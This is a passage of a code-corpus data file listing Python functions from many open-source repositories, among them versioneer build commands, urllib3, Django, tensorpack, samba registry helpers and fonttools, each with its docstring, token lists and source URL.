cmd_build_exe(_build_exe): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() target_versionfile = cfg.versionfile_source print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) _build_exe.run(self) os.unlink(target_versionfile) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write( LONG % { "DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, } ) cmds["build_exe"] = cmd_build_exe del cmds["build_py"] if "py2exe" in sys.modules: # py2exe enabled? try: from py2exe.distutils_buildexe import py2exe as _py2exe # py3 except ImportError: from py2exe.build_exe import py2exe as _py2exe # py2 class cmd_py2exe(_py2exe): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() target_versionfile = cfg.versionfile_source print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) _py2exe.run(self) os.unlink(target_versionfile) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write( LONG % { "DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, } ) cmds["py2exe"] = cmd_py2exe # we override different "sdist" commands for both environments if "setuptools" in sys.modules: from setuptools.command.sdist import sdist as _sdist else: from distutils.command.sdist import sdist as _sdist class cmd_sdist(_sdist): def run(self): versions = get_versions() self._versioneer_generated_versions = versions # unless we update this, the command will keep using the old # version self.distribution.metadata.version = versions["version"] return _sdist.run(self) def make_release_tree(self, base_dir, files): root = get_root() cfg = get_config_from_root(root) _sdist.make_release_tree(self, base_dir, files) # now locate _version.py in the new base_dir directory # (remembering that it may be a hardlink) and replace it with an # updated value target_versionfile = os.path.join(base_dir, cfg.versionfile_source) print("UPDATING %s" % target_versionfile) write_to_version_file( target_versionfile, self._versioneer_generated_versions ) cmds["sdist"] = cmd_sdist return cmds
[ "def", "get_cmdclass", "(", ")", ":", "if", "\"versioneer\"", "in", "sys", ".", "modules", ":", "del", "sys", ".", "modules", "[", "\"versioneer\"", "]", "# this fixes the \"python setup.py develop\" case (also 'install' and", "# 'easy_install .'), in which subdependencies of the main project are", "# built (using setup.py bdist_egg) in the same python process. Assume", "# a main project A and a dependency B, which use different versions", "# of Versioneer. A's setup.py imports A's Versioneer, leaving it in", "# sys.modules by the time B's setup.py is executed, causing B to run", "# with the wrong versioneer. Setuptools wraps the sub-dep builds in a", "# sandbox that restores sys.modules to it's pre-build state, so the", "# parent is protected against the child's \"import versioneer\". By", "# removing ourselves from sys.modules here, before the child build", "# happens, we protect the child from the parent's versioneer too.", "# Also see https://github.com/warner/python-versioneer/issues/52", "cmds", "=", "{", "}", "# we add \"version\" to both distutils and setuptools", "from", "distutils", ".", "core", "import", "Command", "class", "cmd_version", "(", "Command", ")", ":", "description", "=", "\"report generated version string\"", "user_options", "=", "[", "]", "boolean_options", "=", "[", "]", "def", "initialize_options", "(", "self", ")", ":", "pass", "def", "finalize_options", "(", "self", ")", ":", "pass", "def", "run", "(", "self", ")", ":", "vers", "=", "get_versions", "(", "verbose", "=", "True", ")", "print", "(", "\"Version: %s\"", "%", "vers", "[", "\"version\"", "]", ")", "print", "(", "\" full-revisionid: %s\"", "%", "vers", ".", "get", "(", "\"full-revisionid\"", ")", ")", "print", "(", "\" dirty: %s\"", "%", "vers", ".", "get", "(", "\"dirty\"", ")", ")", "print", "(", "\" date: %s\"", "%", "vers", ".", "get", "(", "\"date\"", ")", ")", "if", "vers", "[", "\"error\"", "]", ":", "print", "(", "\" error: %s\"", "%", "vers", "[", "\"error\"", "]", ")", "cmds", "[", "\"version\"", "]", "=", "cmd_version", "# we override \"build_py\" in both distutils and setuptools", "#", "# most invocation pathways end up running build_py:", "# distutils/build -> build_py", "# distutils/install -> distutils/build ->..", "# setuptools/bdist_wheel -> distutils/install ->..", "# setuptools/bdist_egg -> distutils/install_lib -> build_py", "# setuptools/install -> bdist_egg ->..", "# setuptools/develop -> ?", "# pip install:", "# copies source tree to a tempdir before running egg_info/etc", "# if .git isn't copied too, 'git describe' will fail", "# then does setup.py bdist_wheel, or sometimes setup.py install", "# setup.py egg_info -> ?", "# we override different \"build_py\" commands for both environments", "if", "\"setuptools\"", "in", "sys", ".", "modules", ":", "from", "setuptools", ".", "command", ".", "build_py", "import", "build_py", "as", "_build_py", "else", ":", "from", "distutils", ".", "command", ".", "build_py", "import", "build_py", "as", "_build_py", "class", "cmd_build_py", "(", "_build_py", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "_build_py", ".", "run", "(", "self", ")", "# now locate _version.py in the new build/ directory and replace", "# it with an updated value", "if", "cfg", ".", "versionfile_build", ":", "target_versionfile", "=", "os", ".", "path", ".", "join", "(", "self", ".", "build_lib", ",", "cfg", ".", "versionfile_build", ")", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "cmds", "[", "\"build_py\"", "]", "=", "cmd_build_py", "if", "\"cx_Freeze\"", "in", "sys", ".", "modules", ":", "# cx_freeze enabled?", "from", "cx_Freeze", ".", "dist", "import", "build_exe", "as", "_build_exe", "# nczeczulin reports that py2exe won't like the pep440-style string", "# as FILEVERSION, but it can be used for PRODUCTVERSION, e.g.", "# setup(console=[{", "# \"version\": versioneer.get_version().split(\"+\", 1)[0], # FILEVERSION", "# \"product_version\": versioneer.get_version(),", "# ...", "class", "cmd_build_exe", "(", "_build_exe", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "target_versionfile", "=", "cfg", ".", "versionfile_source", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "_build_exe", ".", "run", "(", "self", ")", "os", ".", "unlink", "(", "target_versionfile", ")", "with", "open", "(", "cfg", ".", "versionfile_source", ",", "\"w\"", ")", "as", "f", ":", "LONG", "=", "LONG_VERSION_PY", "[", "cfg", ".", "VCS", "]", "f", ".", "write", "(", "LONG", "%", "{", "\"DOLLAR\"", ":", "\"$\"", ",", "\"STYLE\"", ":", "cfg", ".", "style", ",", "\"TAG_PREFIX\"", ":", "cfg", ".", "tag_prefix", ",", "\"PARENTDIR_PREFIX\"", ":", "cfg", ".", "parentdir_prefix", ",", "\"VERSIONFILE_SOURCE\"", ":", "cfg", ".", "versionfile_source", ",", "}", ")", "cmds", "[", "\"build_exe\"", "]", "=", "cmd_build_exe", "del", "cmds", "[", "\"build_py\"", "]", "if", "\"py2exe\"", "in", "sys", ".", "modules", ":", "# py2exe enabled?", "try", ":", "from", "py2exe", ".", "distutils_buildexe", "import", "py2exe", "as", "_py2exe", "# py3", "except", "ImportError", ":", "from", "py2exe", ".", "build_exe", "import", "py2exe", "as", "_py2exe", "# py2", "class", "cmd_py2exe", "(", "_py2exe", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "target_versionfile", "=", "cfg", ".", "versionfile_source", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "_py2exe", ".", "run", "(", "self", ")", "os", ".", "unlink", "(", "target_versionfile", ")", "with", "open", "(", "cfg", ".", "versionfile_source", ",", "\"w\"", ")", "as", "f", ":", "LONG", "=", "LONG_VERSION_PY", "[", "cfg", ".", "VCS", "]", "f", ".", "write", "(", "LONG", "%", "{", "\"DOLLAR\"", ":", "\"$\"", ",", "\"STYLE\"", ":", "cfg", ".", "style", ",", "\"TAG_PREFIX\"", ":", "cfg", ".", "tag_prefix", ",", "\"PARENTDIR_PREFIX\"", ":", "cfg", ".", "parentdir_prefix", ",", "\"VERSIONFILE_SOURCE\"", ":", "cfg", ".", "versionfile_source", ",", "}", ")", "cmds", "[", "\"py2exe\"", "]", "=", "cmd_py2exe", "# we override different \"sdist\" commands for both environments", "if", "\"setuptools\"", "in", "sys", ".", "modules", ":", "from", "setuptools", ".", "command", ".", "sdist", "import", "sdist", "as", "_sdist", "else", ":", "from", "distutils", ".", "command", ".", "sdist", "import", "sdist", "as", "_sdist", "class", "cmd_sdist", "(", "_sdist", ")", ":", "def", "run", "(", "self", ")", ":", "versions", "=", "get_versions", "(", ")", "self", ".", "_versioneer_generated_versions", "=", "versions", "# unless we update this, the command will keep using the old", "# version", "self", ".", "distribution", ".", "metadata", ".", "version", "=", "versions", "[", "\"version\"", "]", "return", "_sdist", ".", "run", "(", "self", ")", "def", "make_release_tree", "(", "self", ",", "base_dir", ",", "files", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "_sdist", ".", "make_release_tree", "(", "self", ",", "base_dir", ",", "files", ")", "# now locate _version.py in the new base_dir directory", "# (remembering that it may be a hardlink) and replace it with an", "# updated value", "target_versionfile", "=", "os", ".", "path", ".", "join", "(", "base_dir", ",", "cfg", ".", "versionfile_source", ")", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "self", ".", "_versioneer_generated_versions", ")", "cmds", "[", "\"sdist\"", "]", "=", "cmd_sdist", "return", "cmds" ]
https://github.com/martinfleis/momepy/blob/ea90c32dd8f6f9ae7d71d2cd5a02e79572c3e8f7/versioneer.py#L1527-L1706
WZBSocialScienceCenter/tmtoolkit
ed9b1d4af572cf10eae37b9566e229e2dd487605
tmtoolkit/topicmod/model_stats.py
python
marginal_word_distrib
(topic_word_distrib, p_t)
return (topic_word_distrib.T * p_t).sum(axis=1)
Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`. :param topic_word_distrib: topic-word distribution; shape KxM, where K is number of topics, M is vocabulary size :param p_t: marginal topic distribution; array of size K :return: array of size M (vocabulary size) with marginal word distribution
Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`.
[ "Return", "the", "marginal", "word", "distribution", "p", "(", "w", ")", "(", "term", "proportions", "derived", "from", "topic", "model", ")", "given", "the", "topic", "-", "word", "distribution", "(", "phi", ")", "topic_word_distrib", "and", "the", "marginal", "topic", "distribution", "p", "(", "T", ")", "p_t", ".", "The", "latter", "can", "be", "calculated", "with", ":", "func", ":", "~tmtoolkit", ".", "topicmod", ".", "model_stats", ".", "marginal_topic_distrib", "." ]
def marginal_word_distrib(topic_word_distrib, p_t): """ Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`. :param topic_word_distrib: topic-word distribution; shape KxM, where K is number of topics, M is vocabulary size :param p_t: marginal topic distribution; array of size K :return: array of size M (vocabulary size) with marginal word distribution """ return (topic_word_distrib.T * p_t).sum(axis=1)
[ "def", "marginal_word_distrib", "(", "topic_word_distrib", ",", "p_t", ")", ":", "return", "(", "topic_word_distrib", ".", "T", "*", "p_t", ")", ".", "sum", "(", "axis", "=", "1", ")" ]
https://github.com/WZBSocialScienceCenter/tmtoolkit/blob/ed9b1d4af572cf10eae37b9566e229e2dd487605/tmtoolkit/topicmod/model_stats.py#L29-L39
benknight/hue-alfred-workflow
4447ba61116caf4a448b50c4bfb866565d66d81e
logic/packages/requests/packages/urllib3/request.py
python
RequestMethods.request_encode_url
(self, method, url, fields=None, **urlopen_kw)
return self.urlopen(method, url, **urlopen_kw)
Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc.
Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc.
[ "Make", "a", "request", "using", ":", "meth", ":", "urlopen", "with", "the", "fields", "encoded", "in", "the", "url", ".", "This", "is", "useful", "for", "request", "methods", "like", "GET", "HEAD", "DELETE", "etc", "." ]
def request_encode_url(self, method, url, fields=None, **urlopen_kw): """ Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc. """ if fields: url += '?' + urlencode(fields) return self.urlopen(method, url, **urlopen_kw)
[ "def", "request_encode_url", "(", "self", ",", "method", ",", "url", ",", "fields", "=", "None", ",", "*", "*", "urlopen_kw", ")", ":", "if", "fields", ":", "url", "+=", "'?'", "+", "urlencode", "(", "fields", ")", "return", "self", ".", "urlopen", "(", "method", ",", "url", ",", "*", "*", "urlopen_kw", ")" ]
https://github.com/benknight/hue-alfred-workflow/blob/4447ba61116caf4a448b50c4bfb866565d66d81e/logic/packages/requests/packages/urllib3/request.py#L81-L88
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_hxb2/lib/python3.5/site-packages/django/core/exceptions.py
python
ValidationError.message_dict
(self)
return dict(self)
[]
def message_dict(self): # Trigger an AttributeError if this ValidationError # doesn't have an error_dict. getattr(self, 'error_dict') return dict(self)
[ "def", "message_dict", "(", "self", ")", ":", "# Trigger an AttributeError if this ValidationError", "# doesn't have an error_dict.", "getattr", "(", "self", ",", "'error_dict'", ")", "return", "dict", "(", "self", ")" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/django/core/exceptions.py#L151-L156
ofek/hatch
ff67fb61056a5b682951c9d2f6e9ef935d6181f6
hatch/cli/publish/__init__.py
python
publish
(app, artifacts, user, auth, repo, no_prompt, publisher_name, options)
Publish build artifacts.
Publish build artifacts.
[ "Publish", "build", "artifacts", "." ]
def publish(app, artifacts, user, auth, repo, no_prompt, publisher_name, options): """Publish build artifacts.""" option_map = {'no_prompt': no_prompt} if publisher_name == 'pypi': if options: app.abort('Use the standard CLI flags rather than passing explicit options when using the `pypi` plugin') if user: option_map['user'] = user if auth: option_map['auth'] = auth if repo: option_map['repo'] = repo else: # no cov for option in options: key, _, value = option.partition('=') option_map[key] = value publisher_class = app.plugins.publisher.get(publisher_name) if publisher_class is None: app.abort(f'Unknown publisher: {publisher_name}') publisher = publisher_class( app.get_safe_application(), app.project.location, app.cache_dir / 'publish' / publisher_name, app.project.config.publish.get(publisher_name, {}), app.config.publish.get(publisher_name, {}), ) publisher.publish(list(artifacts), option_map)
[ "def", "publish", "(", "app", ",", "artifacts", ",", "user", ",", "auth", ",", "repo", ",", "no_prompt", ",", "publisher_name", ",", "options", ")", ":", "option_map", "=", "{", "'no_prompt'", ":", "no_prompt", "}", "if", "publisher_name", "==", "'pypi'", ":", "if", "options", ":", "app", ".", "abort", "(", "'Use the standard CLI flags rather than passing explicit options when using the `pypi` plugin'", ")", "if", "user", ":", "option_map", "[", "'user'", "]", "=", "user", "if", "auth", ":", "option_map", "[", "'auth'", "]", "=", "auth", "if", "repo", ":", "option_map", "[", "'repo'", "]", "=", "repo", "else", ":", "# no cov", "for", "option", "in", "options", ":", "key", ",", "_", ",", "value", "=", "option", ".", "partition", "(", "'='", ")", "option_map", "[", "key", "]", "=", "value", "publisher_class", "=", "app", ".", "plugins", ".", "publisher", ".", "get", "(", "publisher_name", ")", "if", "publisher_class", "is", "None", ":", "app", ".", "abort", "(", "f'Unknown publisher: {publisher_name}'", ")", "publisher", "=", "publisher_class", "(", "app", ".", "get_safe_application", "(", ")", ",", "app", ".", "project", ".", "location", ",", "app", ".", "cache_dir", "/", "'publish'", "/", "publisher_name", ",", "app", ".", "project", ".", "config", ".", "publish", ".", "get", "(", "publisher_name", ",", "{", "}", ")", ",", "app", ".", "config", ".", "publish", ".", "get", "(", "publisher_name", ",", "{", "}", ")", ",", ")", "publisher", ".", "publish", "(", "list", "(", "artifacts", ")", ",", "option_map", ")" ]
https://github.com/ofek/hatch/blob/ff67fb61056a5b682951c9d2f6e9ef935d6181f6/hatch/cli/publish/__init__.py#L44-L73
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/philips_js/media_player.py
python
PhilipsTVMediaPlayer.media_title
(self)
return self._media_title
Title of current playing media.
Title of current playing media.
[ "Title", "of", "current", "playing", "media", "." ]
def media_title(self): """Title of current playing media.""" return self._media_title
[ "def", "media_title", "(", "self", ")", ":", "return", "self", ".", "_media_title" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/philips_js/media_player.py#L246-L248
nadineproject/nadine
c41c8ef7ffe18f1853029c97eecc329039b4af6c
doors/keymaster/models.py
python
Keymaster.unresolved_logs
(self)
return self.gatekeeperlog_set.filter(keymaster=self, resolved=False)
[]
def unresolved_logs(self): return self.gatekeeperlog_set.filter(keymaster=self, resolved=False)
[ "def", "unresolved_logs", "(", "self", ")", ":", "return", "self", ".", "gatekeeperlog_set", ".", "filter", "(", "keymaster", "=", "self", ",", "resolved", "=", "False", ")" ]
https://github.com/nadineproject/nadine/blob/c41c8ef7ffe18f1853029c97eecc329039b4af6c/doors/keymaster/models.py#L141-L142
wanggrun/Adaptively-Connected-Neural-Networks
e27066ef52301bdafa5932f43af8feeb23647edb
tensorpack-installed/build/lib/tensorpack/dataflow/common.py
python
MapDataComponent.__init__
(self, ds, func, index=0)
Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. return None to discard this datapoint. index (int): index of the component.
Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. return None to discard this datapoint. index (int): index of the component.
[ "Args", ":", "ds", "(", "DataFlow", ")", ":", "input", "DataFlow", ".", "func", "(", "TYPE", "-", ">", "TYPE|None", ")", ":", "takes", "dp", "[", "index", "]", "returns", "a", "new", "value", "for", "dp", "[", "index", "]", ".", "return", "None", "to", "discard", "this", "datapoint", ".", "index", "(", "int", ")", ":", "index", "of", "the", "component", "." ]
def __init__(self, ds, func, index=0): """ Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. return None to discard this datapoint. index (int): index of the component. """ index = int(index) def f(dp): r = func(dp[index]) if r is None: return None dp = list(dp) # shallow copy to avoid modifying the list dp[index] = r return dp super(MapDataComponent, self).__init__(ds, f)
[ "def", "__init__", "(", "self", ",", "ds", ",", "func", ",", "index", "=", "0", ")", ":", "index", "=", "int", "(", "index", ")", "def", "f", "(", "dp", ")", ":", "r", "=", "func", "(", "dp", "[", "index", "]", ")", "if", "r", "is", "None", ":", "return", "None", "dp", "=", "list", "(", "dp", ")", "# shallow copy to avoid modifying the list", "dp", "[", "index", "]", "=", "r", "return", "dp", "super", "(", "MapDataComponent", ",", "self", ")", ".", "__init__", "(", "ds", ",", "f", ")" ]
https://github.com/wanggrun/Adaptively-Connected-Neural-Networks/blob/e27066ef52301bdafa5932f43af8feeb23647edb/tensorpack-installed/build/lib/tensorpack/dataflow/common.py#L290-L307
tensorpack/tensorpack
fac024f0f72fd593ea243f0b599a51b11fe4effd
tensorpack/tfutils/tower.py
python
TowerContext
(tower_name, is_training, vs_name='')
The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`. Example: .. code-block:: python with TowerContext('', is_training=True): # call a tensorpack layer or a tower function
The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`.
[ "The", "context", "for", "a", "tower", "function", "containing", "metadata", "about", "the", "current", "tower", ".", "Tensorpack", "trainers", "use", ":", "class", ":", "TowerContext", "to", "manage", "tower", "function", ".", "Many", "tensorpack", "layers", "have", "to", "be", "called", "under", "a", ":", "class", ":", "TowerContext", "." ]
def TowerContext(tower_name, is_training, vs_name=''): """ The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`. Example: .. code-block:: python with TowerContext('', is_training=True): # call a tensorpack layer or a tower function """ if is_training: return TrainTowerContext(tower_name, vs_name=vs_name) else: return PredictTowerContext(tower_name, vs_name=vs_name)
[ "def", "TowerContext", "(", "tower_name", ",", "is_training", ",", "vs_name", "=", "''", ")", ":", "if", "is_training", ":", "return", "TrainTowerContext", "(", "tower_name", ",", "vs_name", "=", "vs_name", ")", "else", ":", "return", "PredictTowerContext", "(", "tower_name", ",", "vs_name", "=", "vs_name", ")" ]
https://github.com/tensorpack/tensorpack/blob/fac024f0f72fd593ea243f0b599a51b11fe4effd/tensorpack/tfutils/tower.py#L232-L248
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/google/appengine/api/datastore.py
python
_PushConnection
(new_connection)
Internal method to save the current connection and sets a new one. Args: new_connection: The connection to set.
Internal method to save the current connection and sets a new one.
[ "Internal", "method", "to", "save", "the", "current", "connection", "and", "sets", "a", "new", "one", "." ]
def _PushConnection(new_connection): """Internal method to save the current connection and sets a new one. Args: new_connection: The connection to set. """ __InitConnection() _thread_local.connection_stack.append(new_connection)
[ "def", "_PushConnection", "(", "new_connection", ")", ":", "__InitConnection", "(", ")", "_thread_local", ".", "connection_stack", ".", "append", "(", "new_connection", ")" ]
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/api/datastore.py#L400-L407
wxWidgets/Phoenix
b2199e299a6ca6d866aa6f3d0888499136ead9d6
wx/lib/agw/gradientbutton.py
python
GradientButton.OnMouseEnter
(self, event)
Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`. :param `event`: a :class:`MouseEvent` event to be processed.
Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`.
[ "Handles", "the", "wx", ".", "EVT_ENTER_WINDOW", "event", "for", ":", "class", ":", "GradientButton", "." ]
def OnMouseEnter(self, event): """ Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`. :param `event`: a :class:`MouseEvent` event to be processed. """ if not self.IsEnabled(): return self._mouseAction = HOVER self.Refresh() event.Skip()
[ "def", "OnMouseEnter", "(", "self", ",", "event", ")", ":", "if", "not", "self", ".", "IsEnabled", "(", ")", ":", "return", "self", ".", "_mouseAction", "=", "HOVER", "self", ".", "Refresh", "(", ")", "event", ".", "Skip", "(", ")" ]
https://github.com/wxWidgets/Phoenix/blob/b2199e299a6ca6d866aa6f3d0888499136ead9d6/wx/lib/agw/gradientbutton.py#L319-L331
HazyResearch/pdftotree
0686a1845c7901aa975544a9107fc10594523986
pdftotree/utils/pdf/render.py
python
Renderer.is_mention
(cell_val)
return cell_val >= 0
Nonnegative values in grid cells are reserved for mention ids
Nonnegative values in grid cells are reserved for mention ids
[ "Nonnegative", "values", "in", "grid", "cells", "are", "reserved", "for", "mention", "ids" ]
def is_mention(cell_val): """ Nonnegative values in grid cells are reserved for mention ids """ return cell_val >= 0
[ "def", "is_mention", "(", "cell_val", ")", ":", "return", "cell_val", ">=", "0" ]
https://github.com/HazyResearch/pdftotree/blob/0686a1845c7901aa975544a9107fc10594523986/pdftotree/utils/pdf/render.py#L71-L75
byt3bl33d3r/pth-toolkit
3641cdc76c0f52275315c9b18bf08b22521bd4d7
lib/python2.7/site-packages/samba/samba3/__init__.py
python
Registry.subkeys
(self, key)
return keys
Retrieve the subkeys for the specified key. :param key: Key path. :return: list with key names
Retrieve the subkeys for the specified key.
[ "Retrieve", "the", "subkeys", "for", "the", "specified", "key", "." ]
def subkeys(self, key): """Retrieve the subkeys for the specified key. :param key: Key path. :return: list with key names """ data = self.tdb.get("%s\x00" % key) if data is None: return [] (num, ) = struct.unpack("<L", data[0:4]) keys = data[4:].split("\0") assert keys[-1] == "" keys.pop() assert len(keys) == num return keys
[ "def", "subkeys", "(", "self", ",", "key", ")", ":", "data", "=", "self", ".", "tdb", ".", "get", "(", "\"%s\\x00\"", "%", "key", ")", "if", "data", "is", "None", ":", "return", "[", "]", "(", "num", ",", ")", "=", "struct", ".", "unpack", "(", "\"<L\"", ",", "data", "[", "0", ":", "4", "]", ")", "keys", "=", "data", "[", "4", ":", "]", ".", "split", "(", "\"\\0\"", ")", "assert", "keys", "[", "-", "1", "]", "==", "\"\"", "keys", ".", "pop", "(", ")", "assert", "len", "(", "keys", ")", "==", "num", "return", "keys" ]
https://github.com/byt3bl33d3r/pth-toolkit/blob/3641cdc76c0f52275315c9b18bf08b22521bd4d7/lib/python2.7/site-packages/samba/samba3/__init__.py#L85-L99
tensorflow/datasets
2e496976d7d45550508395fb2f35cf958c8a3414
tensorflow_datasets/core/utils/py_utils.py
python
basename_from_url
(url: str)
return filename or 'unknown_name'
Returns file name of file at given url.
Returns file name of file at given url.
[ "Returns", "file", "name", "of", "file", "at", "given", "url", "." ]
def basename_from_url(url: str) -> str: """Returns file name of file at given url.""" filename = urllib.parse.urlparse(url).path filename = os.path.basename(filename) # Replace `%2F` (html code for `/`) by `_`. # This is consistent with how Chrome rename downloaded files. filename = filename.replace('%2F', '_') return filename or 'unknown_name'
[ "def", "basename_from_url", "(", "url", ":", "str", ")", "->", "str", ":", "filename", "=", "urllib", ".", "parse", ".", "urlparse", "(", "url", ")", ".", "path", "filename", "=", "os", ".", "path", ".", "basename", "(", "filename", ")", "# Replace `%2F` (html code for `/`) by `_`.", "# This is consistent with how Chrome rename downloaded files.", "filename", "=", "filename", ".", "replace", "(", "'%2F'", ",", "'_'", ")", "return", "filename", "or", "'unknown_name'" ]
https://github.com/tensorflow/datasets/blob/2e496976d7d45550508395fb2f35cf958c8a3414/tensorflow_datasets/core/utils/py_utils.py#L469-L476
numenta/numenta-apps
02903b0062c89c2c259b533eea2df6e8bb44eaf3
nta.utils/nta/utils/message_bus_connector.py
python
MessageBusConnector.consume
(self, mqName, blocking=True)
return consumer
Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage. mqName: name of the existing source message queue blocking: if True, the iterable will block until another message becomes available; if False, the iterable will terminate iteration when no more messages are available in the queue. [Defaults to blocking=True] The iterable raises: MessageQueueNotFound Blocking iterable example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: for msg in consumer: processMessageBody(msg.body) msg.ack() Polling example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: msg = consumer.pollOneMessage() if msg is not None: processMessageBody(msg.body) msg.ack()
Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage.
[ "Create", "an", "instance", "of", "_QueueConsumer", "iterable", "for", "consuming", "messages", ".", "The", "iterable", "yields", "an", "instance", "of", "_ConsumedMessage", "." ]
def consume(self, mqName, blocking=True): """ Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage. mqName: name of the existing source message queue blocking: if True, the iterable will block until another message becomes available; if False, the iterable will terminate iteration when no more messages are available in the queue. [Defaults to blocking=True] The iterable raises: MessageQueueNotFound Blocking iterable example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: for msg in consumer: processMessageBody(msg.body) msg.ack() Polling example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: msg = consumer.pollOneMessage() if msg is not None: processMessageBody(msg.body) msg.ack() """ consumer = _QueueConsumer( mqName=mqName, blocking=blocking, prefetchMax=self._PREFETCH_MAX, bus=self) self._consumers.append(consumer) return consumer
[ "def", "consume", "(", "self", ",", "mqName", ",", "blocking", "=", "True", ")", ":", "consumer", "=", "_QueueConsumer", "(", "mqName", "=", "mqName", ",", "blocking", "=", "blocking", ",", "prefetchMax", "=", "self", ".", "_PREFETCH_MAX", ",", "bus", "=", "self", ")", "self", ".", "_consumers", ".", "append", "(", "consumer", ")", "return", "consumer" ]
https://github.com/numenta/numenta-apps/blob/02903b0062c89c2c259b533eea2df6e8bb44eaf3/nta.utils/nta/utils/message_bus_connector.py#L369-L403
DataDog/integrations-core
934674b29d94b70ccc008f76ea172d0cdae05e1e
scylla/datadog_checks/scylla/config_models/defaults.py
python
instance_tls_verify
(field, value)
return True
[]
def instance_tls_verify(field, value): return True
[ "def", "instance_tls_verify", "(", "field", ",", "value", ")", ":", "return", "True" ]
https://github.com/DataDog/integrations-core/blob/934674b29d94b70ccc008f76ea172d0cdae05e1e/scylla/datadog_checks/scylla/config_models/defaults.py#L253-L254
krintoxi/NoobSec-Toolkit
38738541cbc03cedb9a3b3ed13b629f781ad64f6
NoobSecToolkit /tools/inject/plugins/dbms/maxdb/filesystem.py
python
Filesystem.__init__
(self)
[]
def __init__(self): GenericFilesystem.__init__(self)
[ "def", "__init__", "(", "self", ")", ":", "GenericFilesystem", ".", "__init__", "(", "self", ")" ]
https://github.com/krintoxi/NoobSec-Toolkit/blob/38738541cbc03cedb9a3b3ed13b629f781ad64f6/NoobSecToolkit /tools/inject/plugins/dbms/maxdb/filesystem.py#L12-L13
fonttools/fonttools
892322aaff6a89bea5927379ec06bc0da3dfb7df
Lib/fontTools/otlLib/builder.py
python
ChainContextualBuilder.buildFormat3Subtable
(self, rule, chaining=True)
return st
[]
